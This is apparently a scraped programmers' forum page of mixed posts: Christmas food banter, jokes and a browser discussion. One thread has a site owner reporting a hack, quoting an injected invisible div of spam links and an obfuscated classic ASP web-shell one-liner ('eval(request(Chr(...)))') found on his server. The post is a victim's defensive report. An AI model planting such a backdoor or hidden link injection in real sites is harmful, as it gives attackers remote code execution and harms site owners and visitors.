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Tell your wife she's right - it was the first picture I could find that was not completely off.
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I don't really get excited for any holiday specific food, but a good gammon always turns me on.
No object is so beautiful that, under certain conditions, it will not look ugly. - Oscar Wilde
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Really boring, and very "70's UK" I know...but there are two things I'm looking forward to, and one of them is the Prawn Cocktail I'll be making for Christmas Day starter...
The other is bought in: M&S Sugar Plum Christmas Pudding. By heck, it's good!
Bad command or file name. Bad, bad command! Sit! Stay! Staaaay...
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Here is something you might be interested in, since you probably have the most important ingredient:
Bratkatze.
Our old cat used to be insulted when we visited grandma for a day at christmas. We usually would be ignored for at least a day when we came back. Not even bribing the cat with some treat worked and we always joked that it would be easier if we just cooked the cat.
The language is JavaScript. that of Mordor, which I will not utter here
This is Javascript. If you put big wheels and a racing stripe on a golf cart, it's still a f***ing golf cart.
"I don't know, extraterrestrial?"
"You mean like from space?"
"No, from Canada."
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Ah, but you see, for this question there are no wrong answers. (Actually yes there are, but let's not go in that direction shall we)
I have a friend whose mum is making a Christmas pudding that's locally famous.
I remember the first time I tried it, and having never tried anything like it before it went like:
WTF, can you eat this? It's black!
OMG I'm full.
Can I have another spoon?
Apparently there is no way to stuff more calories into something without using a hydraulic ram, and then she feeds it a daily dose of brandy every day for half a year.
Wrong is evil and must be defeated. - Jeff Ello
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Kebab and Biryani
Warm Regards,
Subho
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We will have roast duck with potatoes and red cabbage.
It is typical but not served as often as goose in Germany.
The dessert will be chocolate pudding and apple pie this year (we could not agree on a single one).
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I am looking forward to bangers and mash for lunch washed down with a cold beer.
“That which can be asserted without evidence, can be dismissed without evidence.”
― Christopher Hitchens
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We're serious eaters, but we really don't have a Christmas dinner traditional food.
This year we're doing prosciutto, capacolla, salami, cheeses, fresh fruits, olives, bread, etc. on Christmas eve. I usually make oyster stew on Christmas eve, but I don't think of it as traditional because it wasn't something I learned growing up.
Christmas morning has another semi-tradition: Bloody Mary's. We'll be having yeasty waffles, bacon, juice and what-not with that. Dinner will center around some fine steaks. We decided against the $1200 roast available through Costco http://www.costco.com/D%E2%80%99Artagnan-Japanese-Wagyu-Boneless-Ribeye-Roast-A-5-Grade.product.100082950.html[^]
cat fud heer
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This is interesting.
I just noticed that on 12/3/2014 all of my .htm files were hacked so that they contain the following code (shortened example:
<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;"> <a href="http://www.asamai.com/">legend blue 11s</a> <a href="http://www.bdast.org/">jordan 11 legend blue</a>
100s of links follow... but I've removed for brevity
NOTE: please don't go to any of thos sites, they are probably malicious
It is quite ingenious - those basterds -- It creates a DIV at the bottom of the page which is invisible (opacity .001) and it is topmost z-index=10 floats it over everything else.
I can see when the files were altered on 12/3/2014.
Passwords
I don't believe I've been compromised in passwords. I think instead a malicious script got injected and runs somehow.
I'm changing everything. Bringing down the site and not allowing them to get away with this.
Any Information?
Does anyone know more about this? How do they do that.
I previously had WordPress running and won't very soon. Maybe something with that. or I've seen others who are saying it may be an IIS 7.x thing.
GoDaddy
This all runs at a GoDaddy site. maybe something they need to fix (security) on IIS?
Any input is really appreciated and I hope to expose this here by posting here so others might see the problem also.
Thank to everyone.
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newton.saber wrote: GoDaddy
I think I see the issue here.
Seriously, though, read this post[^] about how GoDaddy HELPED the hacker!
AFAIK, this is not the first time things like this have happened with GoDaddy.
What do you get when you cross a joke with a rhetorical question?
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The metaphorical solid rear-end expulsions have impacted the metaphorical motorized bladed rotating air movement mechanism.
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Do questions with multiple question marks annoy you???
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Awesome read!!!
Thanks for posting and for the head's up.
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You made any controversial movies recently?
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Star Warts VIII: The Fantom Mendacious
Rambo XVII: Geriatic GI Joe
That's mostly it.
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There was a recent Wordpress hack that caused a lot of problems, maybe somethign to do with that.
Check your site against this scanner: http://sitecheck.sucuri.net/[^]
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Yes, I believe that it was compromised due to WordPress.
I found a classic ASP script which contained an encoded request to a site.
It looked liked this:
<%response.write(now):eval(request(Chr(84)&Chr(88)&Chr(101)&Chr(82)&Chr(99)&Chr(82)&Chr(51)&Chr(109)&Chr(115)&Chr(109)))%>
It is amazing that there was a vulnerability which allowed some script to write files.
Very dangerous.
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This same thing happened at out lunarpages hosted account which is Linux so I don't think it's an IIS issue. I had thought that one of the ftp accounts was hacked so all those were changed and strengthened. Good luck!
"Go forth into the source" - Neal Morse
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Thanks for the input.
After much more investigation -- examining every page on my site -- it looks like it was a WordPress vulnerability which allowed a PHP script to be manipulated to write to HTM files only (no other files were altered).
It's not that bad of a compromise I guess, since they just insert a bunch of links into HTM pages but it was quite annoying to learn that my pages had these links on them -- and that helps the malicious sites get more SEO.
My site is completely clean now and I plan on never using WordPress again. I had applied security patches as I went so a bit frustrating.
WordPress, blech!
1. vulnerable
2. seems quite bloated to me -- lots of files, got to be an easier smaller way
3. Uninstalling, doesn't actually uninstall and delete all files, still have to FTP over and delete a bunch of files
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I have been following the development of PencilBlue[^], it looks to be quite promising. CMS built on node.js and mongo.
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newton.saber wrote: I just noticed that on 12/3/2014 all of my .htm files were hacked It took you nine months to notice?!?
I may have to rethink that offer I made you of web-security manager.
I wanna be a eunuchs developer! Pass me a bread knife!
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Mark_Wallace wrote: 12/3/2014
I'm not in the military (on 12 march, 2014). I'm a civilian (on December 3rd, 2014). Only a few days.
Still, it did take me 14 days or something. The thing is I'm betting there are tens of thousands of WordPress sites out there which have been hacked like this. Makes me not even want to visit any sites running wordpress.
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Here is a discussion about browsers: Clicky[^]
I'm going to disagree with all the comments made in the comments section by saying that I think all browsers today are excellent - I just think we've way too many web pages that suck really, really bad. I keep finding pages that open two dozen ads, run several videos, have popups flying around the screen - how could a browser not choke on that mess?
I'm going to have to call out those people who try to serve up the entire web through a single browser window because they're desperate to try and earn money for doing nothing but dishing up crap.
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Wrong is evil and must be defeated. - Jeff Ello
(√-sh*t) 2
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Precisesly, the rest is look&feel (and getting used to). I'm ok with Firefox now...
Geek code v 3.12
GCS d--- s-/++ a- C++++ U+++ P- L- E-- W++ N++ o+ K- w+++ O? M-- V? PS+ PE- Y+ PGP t++ 5? X R++ tv-- b+ DI+++ D++ G e++>+++ h--- r++>+++ y+++*
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